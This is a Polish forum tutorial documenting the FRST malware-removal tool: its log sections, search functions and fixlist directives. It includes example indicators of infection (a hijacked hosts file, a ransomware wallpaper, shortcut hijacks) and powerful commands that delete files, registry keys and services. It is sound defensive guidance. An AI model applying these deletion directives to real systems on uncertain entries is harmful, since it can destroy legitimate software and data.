By usunąć malware, załącz linie w fixlist.

 

Oprogramowanie OEM (np. Dell) może tworzyć niestandardowe rejestracje. W przypadku nieznanych wejść wyszukaj informację czy obiekty są poprawne czy też nie.

 

 

 

Loaded Modules

Załadowane moduły

 

Załadowane moduły są filtrowane w oparciu o poprawny podpis cyfrowy. W związku z tym w sekcji tej pokazują się tylko obiekty nie przechodzące weryfikacji podpisu cyfrowego.

 

 

Alternate Data Streams

Alternatywne Strumienie Plików

 

Strumienie są prezentowane w następujący sposób:

 

AlternateDataStreams: C:\Windows\System32\poprawnyplik:malware.exe [134]
AlternateDataStreams: C:\malware:malware.exe [134]

 

Na końcu ścieżki dostępu w klamrach jest pokazany rozmiar strumienia ADS (w bajtach).

 

Jeśli dany strumień ADS jest podwiązany do autoryzowanego pliku/katalogu, naprawa polega na skopiowaniu linii z logu i wklejeniu jej do pliku fixlist. Przykład:

 

AlternateDataStreams: C:\Windows\System32\poprawnyplik:malware.exe [134]


Niemniej gdy będzie on podwiązany na szkodliwym pliku/katalogu, naprawą będzie:

 

C:\malware


W pierwszym przypadku FRST usunie wyłącznie strumień ADS z pliku/katalogu. W drugim przypadku plik/katalog zostanie usunięty.


Safe Mode
Tryb Awaryjny

Jeśli brakuje któregokolwiek z głównych kluczy (SafeBoot, SafeBoot\Minimal oraz SafeBoot\Network), zostanie to zaraportowane. W takim przypadku powinno to zostać naprawione ręcznie.
Jeśli figuruje wpis stworzony przez malware, może zostać załączony w fixlist do usunięcia.


Association
Powiązania plików

---> Zajrzyj do wcześniejszej sekcji Association.

Lista skojarzeń plików .bat, .cmd, .com, .exe, .reg i .scr.
Przetwarzanie wejść w fixlist odbywa się w następujący sposób: zmodyfikowanym wpisom domyślnym zostanie przywrócona domyślna postać wejścia, zaś niestandardowy klucz użytkownika zostanie skasowany.


Internet Explorer

Tytuł nagłówka zawiera wersję Internet Explorer na Windows 7 i starszych systemach.

 

W zależności od typu obiektu, FRST skasuje elementy z rejestru lub przywróci ich domyślną postać.
Towarzyszące pliki/foldery muszą być wpisane osobno, jeśli mają zostać usunięte.


Hosts content
Zawartość pliku Hosts

---> Zajrzyj do wcześniejszej sekcji Hosts.

Przedstawia więcej detali związanych z plikiem Hosts: właściwości pliku Hosts oraz pierwsze 30 aktywnych wejść w pliku. Nieaktywne wejścia (skomentowane znakiem #) są ukryte. Przykład:

 

2009-07-14 04:34 - 2016-04-13 15:39 - 00001626 _____ C:\Windows\system32\Drivers\etc\hosts

107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net


Wejścia nie mogą być przetworzone indywidualnie.

- By zresetować standardowy plik, skorzystaj z dyrektywy Hosts: lub załącz linię z ostrzeżeniem Hosts z głównego raportu FRST.txt.

- W przypadku niedomyślnego pliku hosts.ics załącz ścieżkę do pliku w fixlist.



Other Areas
Inne obszary

FRST skanuje pewne elementy nie uwzględnione w innych sekcjach. Lista tylko do odczytu, brak automatycznej naprawy za pośrednictwem skryptu.
 

 

Path

 

Wejście jest widoczne na następujących zasadach: brakuje domyślnego ciągu, niepoprawne uplasowanie domyślnego ciągu, brak wartości Path. Przykład:

 

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path ->

 

Do naprawy zmiennej Path można wykorzystać ręczną naprawę na poziomie rejestru lub edytor Zmiennych środowiskowych.

 

Uszkodzenie Path może wpłynąć na operacje dyrektyw cmd: i Powershell: wykorzystujących ścieżkę relatywną do narzędzi konsolowych.

 


Wallpaper (Tapeta)

 

Różne infekcje szyfrujące dane wykorzystują to ustawienie, by wyświetlić ekran z żądaniem okupu. Przykład:

Standardowa ścieżka może wyglądać podobnie do:
 

HKU\S-1-5-21-2507207478-166344414-3466567977-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg


Ścieżka infekcji może wyglądać podobnie do:
 

HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\User\Moje Dokumenty\!Decrypt-All-Files-scqwxua.bmp


W przypadku szkodliwych wejść ścieżka do pliku może zostać załączona w Fixlist wraz z innymi powiązanymi plikami pokazanymi w głównym raporcie FRST.txt.

 

Usunięcie pliku tapety malware spowoduje usunięcie tła Pulpitu.

 

 

Użytkownik powinien ręcznie ustawić tło Pulpitu:

Windows XP:
Kliknij prawym w dowolnym miejscu Pulpitu i wybierz Właściwości, wybierz kartę Pulpit, wybierz obrazek, kliknij "Zastosuj" i "OK".

Windows Vista i nowsze:
Kliknij prawym w dowolnym miejscu Pulpitu i wybierz Personalizuj, wybierz Tło Pulpitu, wybierz jeden z dostępnych obrazów i kliknij "Zapisz zmiany".

 


DNS Servers (serwery DNS)

 

Bieżące DNS (w użyciu). Lista przydatna do detekcji infekcji DNS routera. Pokazane adresy IP sprawdź przy udziale wyszukiwarki Whois Lookup, by zweryfikować ich pochodzenie.

Przykład wpisów:
 

DNS Servers: 213.46.228.196 - 62.179.104.196

 

Lista serwerów nie jest pobierania z rejestru, system powinien być podłączony do internetu.

 


Jeśli FRST zostanie uruchomiony z poziomu Trybu awaryjnego lub system nie jest podłączony do internetu, w raporcie pojawi się następujący komunikat:
 

DNS Servers: Media is not connected to internet.

 

DNS Servers: Urządzenie nie jest podłączone do internetu.



UAC (Kontrola konta użytkownika)

Włączone UAC (domyślne ustawienie):
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)


Wyłączone UAC:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)


Wyłączona Kontrola konta użytkownika może mieć źródło w ręcznym ustawieniu użytkownika, bądź też być skutkiem aktywności malware. O ile nie jest pewne, że przyczyną jest malware, należy przed rozpoczęciem naprawy skonsultować ustawienia z użytkownikiem.


SmartScreen (Windows 8+)

 

Dla desktopowych aplikacji i plików:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Dane wartości)


Dane wartości obsługiwane przez Windows: Block | Warn | Off (Windows 10 Version 1703 i nowsze) lub RequireAdmin | Prompt | Off (starsze systemy).

Brakująca wartość (domyślne ustawienie na Windows 10 Version 1703 i nowszych) lub pusta wartość zostanie zgłoszona w następujący sposób:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 

 

Telephony Service Providers (TSP)

 

Są filtrowane domyślne wejścia oraz niektóre poprawne wejścia producentów trzecich. Linia jest widoczna tylko w przypadku wykrycia niestandardowego wejścia. Przykład:

 

HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName3 -> C:\Windows\system32\nieznany.tsp (Wydawca)

 

Szkodliwe lub uszkodzone wejścia wymagają ręcznej naprawy na poziomie rejestru. Należy usunąć pasujące rekordy ProviderIDx i ProviderFileNamex i przenumerować pozostałe wejścia.

 

 

BITS

 

Sekcja wylicza zadania BITS (Inteligentnego transferu w tle) używające linii poleceń powiadomień. Zobacz: Attacker Use of the Windows Background Intelligent Transfer Service.

 

BITS: {Identyfikator zadania} - (Nazwa zadania) -> [NotifyCmdLine: Komenda] [files:Zdalna ścieżka -> Lokalna ścieżka]

 

By usunąć wszystkie zadania BITS skorzystaj z dyrektywy EmptyTemp:.



Windows Firewall (Zapora systemu Windows)

FRST zgłasza stan Zapory, jeśli jest włączona lub wyłączona:

 

Windows Firewall is enabled.

 

Zapora systemu Windows [funkcja włączona]


Jeśli FRST został uruchomiony z poziomu Trybu awaryjnego lub istnieje uszkodzenie systemowe, wejście relatywne do Zapory nie zostanie pokazane.

 

 

Network Binding (Windows 8+)

Lista niestandardowych komponentów podwiązanych do połączeń sieciowych. Porównaj sekcję Sterowniki / Drivers, by wytypować pasujący element.

 

Przykład:

 

Network Binding:
=============
Ethernet: COMODO Internet Security Firewall Driver -> inspect (enabled)
Wi-Fi: COMODO Internet Security Firewall Driver -> inspect (enabled)

 

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [129208 2019-10-16] (Comodo Security Solutions, Inc. -> COMODO)

 

W przypadku gdy standardowe odinstalowanie programu zawiedzie i pozostaną w systemie w/w elementy, komponent sieciowy musi zostać usunięty przed próbą przetworzenia sterownika. Wdróż kroki opisane w bazie wiedzy ESET.

 

 

Przed załączeniem sterownika w fixlist upewnij się, że komponent sieciowy został usunięty. W przeciwnym wypadku usunięcie sterownika uszkodzi połączenie sieciowe.




MSCONFIG/TASK MANAGER disabled items
Wyłączone elementy w MSCONFIG i Menedżerze zadań

Log jest użyteczny w sytuacji, gdy użytkownik użył MSCONFIG lub Menedżer zadań aby wyłączyć wpisy malware, zamiast je usunąć. Lub też usunął za dużo i nie może sprawić, by niektóre niezbędne usługi lub aplikacje działały poprawnie.


MSCONFIG w Windows 7 i starszych systemach:

 

MSCONFIG\Services: Quotenamron => 2
MSCONFIG\startupfolder: C:^Users^User^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk => C:\Windows\pss\339bc1.lnk.Startup
MSCONFIG\startupreg: AdAnti => C:\Program Files (x86)\AdAnti\AdAnti.exe /S


Powyższy przykład odczytujemy następująco:

Wyłączone usługi:
 

MSCONFIG\Services: NazwaUsługi => Oryginalny typ startu


Wyłączone elementy z katalogu Startup (Autostart):
 

MSCONFIG\startupfolder: Oryginalna Ścieżka (znaki "\" zastąpione "^" przez Windows) => Ścieżka do kopii zapasowej utworzonej przez Windows


Wyłączone wpisy Run:
 

MSCONFIG\startupreg: NazwaWartości => Ścieżka do pliku



Menedżer zadań w Windows 8 i nowszych systemach:
 

HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\StartupFolder: => "SmartWeb.lnk"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\Run: => "svchost0"

 

W Windows 8 i nowszych systemach msconfig służy tylko do wyłączania usług. Elementy startowe zostały przeniesione do Menedżera zadań, który gromadzi wyłączone wpisy w innych kluczach. Wyłączony istniejący obiekt jest wyliczany podwójnie: w FRST.txt (sekcja Rejestr) i w Addition.txt.

 

 

Wejścia mogą zostać załączone w fixlist w celu ich usunięcia. FRST przeprowadzi następujące akcje:
- W przypadku wyłączonych usług, zostanie usunięty klucz utworzony przez MSCONFIG oraz usługa jako taka.
- W przypadku wyłączonych obiektów Run, zostaną usunięte klucz/wartość utworzone przez MSCONFIG/Menedżer zadań. Wejście Run na nowszych systemach również zostanie usunięte.
- W przypadku obiektów w folderach Startup (Autostart), zostaną usunięte klucz/wartość utworzone przez MSCONFIG/Menedżer zadań i przeniesiony plik kopii zapasowej utworzony przez Windows (na starszych systemach) lub plik jako taki (na nowszych systemach).

 

Ważne: Wejścia z tej sekcji powinny być przetwarzane, gdy jest pewność że to wejścia malware. Przy braku pewności co do natury wejść, nie przetwarzaj ich by uniknąć usunięcia poprawnych obiektów. W przypadku prawidłowych wejść które powinny zostać włączone, należy poinstruować użytkownika, by je aktywował przy udziale narzędzia MSCONFIG lub Menedżera zadań.

 

 


FirewallRules
Reguły Zapory systemu Windows

Spis autoryzacji typu FirewallRules, AuthorizedApplications i GloballyOpenPorts.

Przykład z Windows 10:
 

FirewallRules: [{E3D59A00-E41A-4AE5-AECF-E7AC117FBF83}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Chao Wei -> )
FirewallRules: [{7FEA26C4-3ECE-4431-8FA1-E9AFE7F3B0DD}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation -> Mozilla Corporation)


Przykład z Windows XP:
 

StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\bin\FirefoxUpdate.exe] => Enabled:Update service
StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\Firefox.exe] => Enabled:Firefox browser
StandardProfile\GloballyOpenPorts: [2900:TCP] => Enabled:ztdtqhnh


Jeśli dane wejście zostanie załączone w fixlist, rekord zostanie usunięty z rejestru. Powiązany plik nie zostanie usunięty z dysku.


Restore Points
Punkty Przywracania systemu

---> Zajrzyj do wcześniejszej sekcji Restore Points.

Lista punktów Przywracania systemu formatowana w następujący sposób:
 

18-04-2016 14:39:58 Windows Update
18-04-2016 22:04:49 Restore Point Created by FRST


Jeśli funkcja jest wyłączona, pojawi się ostrzeżenie:
 

ATTENTION: System Restore is disabled (Total:59.04 GB) (Free:43.19 GB) (73%)

 

UWAGA: Przywracanie systemu jest wyłączone (Total:59.04 GB) (Free:43.19 GB) (73%)

 

Linia odnosi się do Przywracania systemu wyłączonego w standardowy sposób. Przywracanie systemu zablokowane via Zasady grupy zostanie zaraportowane w FRST.txt (w sekcji Rejestr). W obu przypadkach Przywracanie systemu może zostać automatycznie włączone przy udziale dyrektywy SystemRestore: (zobacz opis w sekcji Dyrektyw).




Faulty Device Manager Devices
Wadliwe urządzenia w Menedżerze urządzeń

Przykład:
 

Name: bsdriver
Description: bsdriver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: bsdriver
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.



Event log errors
Błędy w Dzienniku zdarzeń

 

 

  • Błędy Aplikacja
  • Błędy System
  • Błędy CodeIntegrity
  • Błędy i ostrzeżenia Windows Defender

.

Memory info
Statystyki pamięci

---> Zajrzyj do wcześniejszej sekcji Memory Info.


Drives
Dyski


MBR & Partition Table
MBR & Tablica partycji

---> Zajrzyj do wcześniejszej sekcji Drives - MBR & Partition Table.


.

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngPozostałe skany opcjonalne

 

 

Skany opcjonalne

Po zaznaczeniu danego pola w sekcji "Optional Scan" / "Skan opcjonalny" FRST zwróci skan żądanych obiektów.


List BCD
Lista BCD

Wyciąg konfiguracji Boot Configuration Data (BCD).


SigCheckExt

Wykaz wszystkich niepodpisanych cyfrowo plików EXE i DLL w standardowych folderach. Wyniki są sformatowane w taki sam sposób jak lista "One month" (Jeden miesiąc).


Shortcut.txt
Skróty użytkowników

Spis wszystkich typów skrótów wszystkich standardowych kont użytkowników. Szkodliwie zmodyfikowane wejścia mogą zostać załączone w fixlist w celu ich naprawy lub usunięcia.

Przykład:

 

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%


By naprawić wpisy typu ShortcutWithArgument:, po prostu skopiuj i przeklej linie do fixlist. Jednakże w celu usunięcia wpisów typu Shortcut: załącz ścieżki z osobna. Całościowy skrypt wyglądałby następująco:

 

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
C:\Program Files (x86)\jIxmRfR
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

 

FRST usuwa argumenty ze skrótów z pominięciem skrótu Internet Explorer (No Add-ons).lnk / Internet Explorer (bez dodatków).lnk, który jest przywracany do postaci domyślnej (argument -extoff). Ten parametr skrótu odpowiada za uruchomienie Internet Explorer bez dodatków i jest istotny w diagnostyce przeglądarki.

 

 

Jeśli inne narzędzie niepoprawnie usunęło argument skrótu Internet Explorer (No Add-ons).lnk / Internet Explorer (bez dodatków).lnk, skrót traci etykietę ShortcutWithArgument: w logu i jego naprawa z poziomu FRST nie będzie możliwa. W tym przypadku użytkownik musi przywrócić argument ręcznie.

 

 

By uzupełnić brakujący argument ręcznie, użytkownik powinien wyszukać skrót Internet Explorer (Bez dodatków).lnk:

Kliknąć prawym i wybrać Właściwości. W polu Element docelowy na końcu pokazanej ścieżki dodać dwie spacje a następnie -extoff. Kliknąć Zastosuj i OK.


Notatka dla użytkowników fixitpc.pl:

Na polskich systemach Vista i nowszych ścieżka do skrótu jest widziana w polskiej formie tylko z poziomu eksploratora Windows, ale faktyczna struktura jest anglojęzyczna:
C:\Users\Użytkownik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
Na polskich systemach XP jednak ścieżka jest w pełni spolonizowana:
C:\Documents and Settings\Użytkownik\Menu Start\Programy\Akcesoria\Narzędzia systemowe\Internet Explorer (bez dodatków).lnk

 

 


90 Days Files
Pliki i katalogi utworzone w ciągu ostatnich trzech miesięcy

Jeśli opcja "90 Days Files" / "Pliki z 90 dni" zostanie zaznaczona, FRST w skanie głównym wyliczy "Three months (Created/Modified)" / "Trzy miesiące (utworzone/zmodyfikowane)" zamiast "One month (Created/Modified)" / "Jeden miesiąc (utworzone/zmodyfikowane)".



Funkcja wyszukiwania


Search Files
Wyszukiwanie plików

W konsoli FRST znajduje się przycisk Search Files / Szukaj plików. W celu wyszukania plików wpisz ręcznie lub przeklej ich nazwy do pola Search / Szukaj. Symbole wieloznaczne są dozwolone. Przy wyszukiwaniu więcej niż jednego pliku nazwy plików powinny zostać rozdzielone średnikiem ;

 

fraza;fraza

 

*fraza*;*fraza*


Po naciśnięciu przycisku użytkownik zostaje poinformowany, że wyszukiwanie zostało rozpoczęte, pojawia się pasek postępu, a na koniec zgłasza się komunikat informujący, że wyszukiwanie zostało zakończone. Wynikowy raport Search.txt zostaje zapisany w tym samym miejscu, w którym znajduje się FRST.

Odnalezione pliki zostają wylistowane wraz z datą utworzenia, modyfikacji, rozmiarem, atrybutami, nazwą producenta, sumą kontrolną MD5 oraz podpisem cyfrowym w następującym formacie:

 

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.15063.608_none_2ad0781c8951a362\dnsapi.dll
[2017-03-18 22:57][2017-03-18 22:57] 000661224 _____ (Microsoft Corporation) 0F9FA6A2D4EAE50393DCE473759A9845 [Plik podpisany cyfrowo]

 

Funkcja wyszukiwania jest ograniczona do dysku systemowego. Są sytuacje, gdy autoryzowany plik systemowy jest nieobecny lub uszkodzony powodując problemy z uruchomieniem systemu, a brak zamiennika w systemie. Jeśli opcja zostanie użyta w Środowisku odzyskiwania systemu (Vista lub nowsze), wyszukiwanie obejmie także pliki na dysku X: (wirtualny dysk startowy). W niektórych przypadkach może to być ostatnia deska ratunku. Za przykład może posłużyć brakujący plik services.exe, który mógłby zostać skopiowany z X:\Windows\System32 do C:\Windows\System32.

 

 

Dysk X: będzie zawierać wyłącznie programy 64-bit na systemach 64-bit.

 

 

Przycisk Search Files / Szukaj plików udostępnia też dodatkowe wyszukiwanie, zobacz poniższe opisy FindFolder: i SearchAll:. Rezultaty są nagrywane w pliku Search.txt.

 

 


Search Registry
Wyszukiwanie w rejestrze

W konsoli FRST znajduje się również przycisk Search Registry / Szukaj w rejestrze. W polu Search / Szukaj można wpisać bezpośrednio lub wkleić ciągi planowane do wyszukiwania. Przy wyszukiwaniu większej ilości fraz powinny zostać one rozdzielone średnikiem ;

 

fraza;fraza


Przy wyszukiwaniu w rejestrze, w odróżnieniu od wyszukiwania plików, wykorzystanie symboli wieloznacznych w wyszukiwanych frazach jest niepożądane, gdyż owe symbole zostaną zinterpretowane dosłownie. Z tego też powodu jeśli symbol wieloznaczny ("*" lub "?") zostanie wykorzystany na początku lub końcu wyszukiwanej frazy, FRST zignoruje znak i przeprowadzi wyszukiwanie na frazę go pozbawioną.
 
Wynikowy raport SearchReg.txt zostaje zapisany w tym samym miejscu, w którym znajduje się FRST.

 

Funkcja wyszukiwania w rejestrze działa tylko poza Środowiskiem odzyskiwania systemu (RE).


 
 
FindFolder:
Wyszukiwanie folderów

By wyszukać folder(y) na dysku systemowym, wprowadź następującą składnię w polu Search / Szukaj i wciśnij przycisk Search Files / Szukaj plików:

 

FindFolder: fraza;fraza


Znaki wieloznaczne są obsługiwane:

 

FindFolder: *fraza*;*fraza*

 
 
SearchAll:
Pełne wyszukiwanie

By przeprowadzić pełne wyszukiwanie (pliki, foldery, rejestr) dla jednej lub większej ilości fraz, wprowadź następującą składnię w polu Search / Szukaj i wciśnij przycisk Search Files / Szukaj plików:

 

SearchAll: fraza;fraza


Nie dodawaj znaków wieloznacznych do fraz. FRST automatycznie interpretuje frazy jako *frazy* w przypadku plików i folderów.

 

Pełne wyszukiwanie przeprowadzone w Środowisku odzyskiwania systemu (RE) jest ograniczone do plików i folderów.


 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngDyrektywy/Polecenia

 

 

 

Wszystkie dyrektywy/polecenia w FRST powinny być w osobnych liniach, ze względu na to, że FRST przetwarza skrypt linia po linii.

 

 

Wielkość liter nie ma znaczenia w przypadku dyrektyw/poleceń.

 


Szybki przegląd Dyrektyw/Poleceń:


Do użycia tylko w Trybie normalnym:

CreateRestorePoint:
SystemRestore:

TasksDetails:

Do użycia tylko w Trybie normalnym, Trybie awaryjnym:

CloseProcesses:

EmptyEventLogs:
EmptyTemp:
Powershell:
Reboot:
RemoveProxy:

StartPowershell: — EndPowershell:

Virusscan:
Zip:

Do użycia w Trybie normalnym, Trybie awaryjnym, Środowisku odzyskiwania systemu (RE):

cmd:

Comment:

Copy:

CreateDummy:
DeleteJunctionsInDirectory:

DeleteKey:
DeleteQuarantine:

DeleteValue:
DisableService:

ExportKey:

ExportValue:
File:

FilesInDirectory:
FindFolder:
Folder:
Hosts:
ListPermissions:
Move:
Reg:
RemoveDirectory:
Replace:
RestoreQuarantine:
SaveMbr:
SetDefaultFilePermissions:

StartBatch: — EndBatch:

StartRegedit: — EndRegedit:

Symlink:
testsigning on:
Unlock:

Do użycia tylko w Środowisku odzyskiwania systemu (RE):

LastRegBack:

RestoreFromBackup:
RestoreMbr:
 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngDyrektywy/Polecenia

 

 

 

CloseProcesses:

Do zabijania wszystkich nieesencjonalnych procesów, co zwiększa efektywność i szybkość procesu naprawy.


Załączenie dyrektywy w skrypcie naprawy skutkuje automatycznym resetem systemu. Nie ma potrzeby używania dyrektywy Reboot:. Dyrektywa CloseProcesses: jest zbędna, a więc i niedostępna w Środowisku odzyskiwania systemu (RE).


CMD:

Gdy zachodzi potrzeba uruchomienia polecenia CMD, możesz skorzystać z dyrektywy "CMD:" Skrypt będzie wyglądał następująco:

 

CMD: komenda


Jeśli ma zostać użyte więcej niż jedno polecenie, każde z nich należy umieścić w osobnych liniach rozpoczynających się od "CMD:". Przykład:

 

CMD: copy /y c:\windows\minidump\*.dmp e:\
CMD: bootrec /FixMbr


Pierwsze polecenie skopiuje pliki minidump na dysk przenośny (jeśli literką dysku dla dysku przenośnego jest E).
Drugie polecenie służy do naprawy MBR w Windows Vista i nowszych.

Alternatywnie można skorzystać z dyrektyw StartBatch:EndBatch: (patrz dalej).

 

W odróżnieniu od natywnych lub innych dyrektyw FRST, polecenia cmd muszą mieć odpowiednią składnię, jak np. użycie cudzysłowów " w przypadku spacji w ścieżkach plików/katalogów.

 

 

Comment:

 

Dodaje notatkę z objaśnieniami / uwagami odnośnie zawartości Fixlist. Przykład:

 

Comment: Następująca komenda usunie wszystkie ustawienia proxy z systemu
RemoveProxy:

 

 

Copy:

Do kopiowania plików lub folderów w stylu podobnym do xcopy. Składnia polecenia:

 

Copy: źródłowy plik/folder docelowy folder


Docelowy folder zostanie automatycznie utworzony (jeśli nie istnieje).

Przykład:

 

Copy: C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb C:\Users\User\Desktop\Edge Backup
Copy: C:\Windows\Minidump F:\

 

Do zamiany pojedynczych plików jest zalecane wykorzystanie dyrektywy Replace:. W przypadku gdy istnieje docelowy plik Copy: tylko próbuje go nadpisać, podczas gdy Replace: dodatkowo próbuje plik odblokować i przesunąć do Quarantine.

 

 

CreateDummy:

Tworzy atrapę w postaci zablokowanego folderu, by zapobiec odtwarzaniu szkodliwego pliku/folderu. Folder-atrapa powinien zostać usunięty po kompletnym zneutralizowaniu malware. Składnia polecenia:

 

CreateDummy: ścieżka


Przykład:

 

CreateDummy: C:\Windows\system32\szkodnik.exe
CreateDummy: C:\ProgramData\Szkodnik

 


CreateRestorePoint:

Do tworzenia punktu Przywracania systemu.

 

Dyrektywa działa tylko w Trybie normalnym i pod warunkiem, że Przywracanie systemu nie jest wyłączone.

 

 

DeleteJunctionsInDirectory:

Do usuwania junkcji / linku symbolicznego do katalogu. Składnia polecenia:

 

DeleteJunctionsInDirectory: ścieżka


Przykład:

 

DeleteJunctionsInDirectory: C:\Program Files\Windows Defender

 


DeleteKey: i DeleteValue:

Najskuteczniejszy sposób usuwania kluczy/wartości rejestru, obchodzący ograniczenia standardowych algorytmów usuwania obecnych w dyrektywach Reg: i StartRegedit: — EndRegedit:.

Składnia poleceń:

1. Dla kluczy:

 

DeleteKey: klucz


Alternatywnie można też zastosować format regedit:

 

[-klucz]


2. Dla wartości:

 

DeleteValue: klucz|wartość


Jeśli wartość jest wartością domyślną, pozostaw nazwę wartości pustą:

 

DeleteValue: klucz|


Przykład:

 

DeleteKey: HKLM\SOFTWARE\Microleaves
DeleteValue: HKEY_CURRENT_USER\Environment|SNF
DeleteValue: HKU\S-1-5-21-3145329596-257967906-3285628945-1000\Software\Clients\StartMenuInternet|
[-HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Dataup]


Dyrektywy adresują klucze/wartości zablokowane, które mają ograniczone uprawnienia lub zawierają znaki zerowe null, oraz linki symboliczne rejestru. Nie ma potrzeby stosowania dyrektywy Unlock:.

W przypadku kluczy/wartości, które są zabezpieczone aktywnym oprogramowaniem i zwracają komunikat "Odmowa dostępu", przed podjęciem próby z komendami należy przeprowadzić jedną z tych akcji: ograniczyć uruchomione procesy poprzez przejście do Trybu awaryjnego lub usunąć ofensywne komponenty.

 

Przy przetwarzaniu linka symbolicznego rejestru jest usuwany tylko klucz źródłowy, czyli link per se. Klucz docelowy nie zostanie usunięty. Ma to na celu zabezpieczenie pod kątem sytuacji, gdy szkodliwy link jest podwiązany do autoryzowanego klucza, który zostałby omyłkowo usunięty. Jeżeli zarówno klucz źródłowy jak i docelowy mają szkodliwy charakter, oba powinny zostać załączone do usunięcia.

 

 

DeleteQuarantine:

Po zakończeniu czyszczenia, katalog %SystemDrive%\FRST (zazwyczaj C:\FRST) utworzony przez FRST powinien zostać usunięty z komputera. W niektórych przypadkach katalog ten nie może zostać usunięty ręcznie, ponieważ podkatalog %SystemDrive%\FRST\Quarantine zawiera zablokowane lub nietypowe pliki / katalogi malware. Polecenie DeleteQuarantine: usuwa katalog Quarantine.


Narzędzia, które przenoszą pliki, a nie usuwają, nie powinny być używane do kasowania C:\FRST, ponieważ narzędzia te przenoszą pliki do swoich własnych katalogów, które pozostają mimo wszystko w systemie.

 

Automatyczna deinstalacja FRST (zobacz stosowny opis w sekcji Wprowadzenie) posiada tę samą zdolność usuwania zablokowanego folderu Quarantine.

 

 

DisableService:

Do wyłączania usługi lub sterownika. Składnia polecenia:

 

DisableService: NazwaUsługi


Przykład:

 

DisableService: sptd
DisableService: Wmware Nat Service


FRST ustawi typ startu usługi na wyłączony i usługa nie zostanie uruchomiona przy następnym starcie systemu.

 

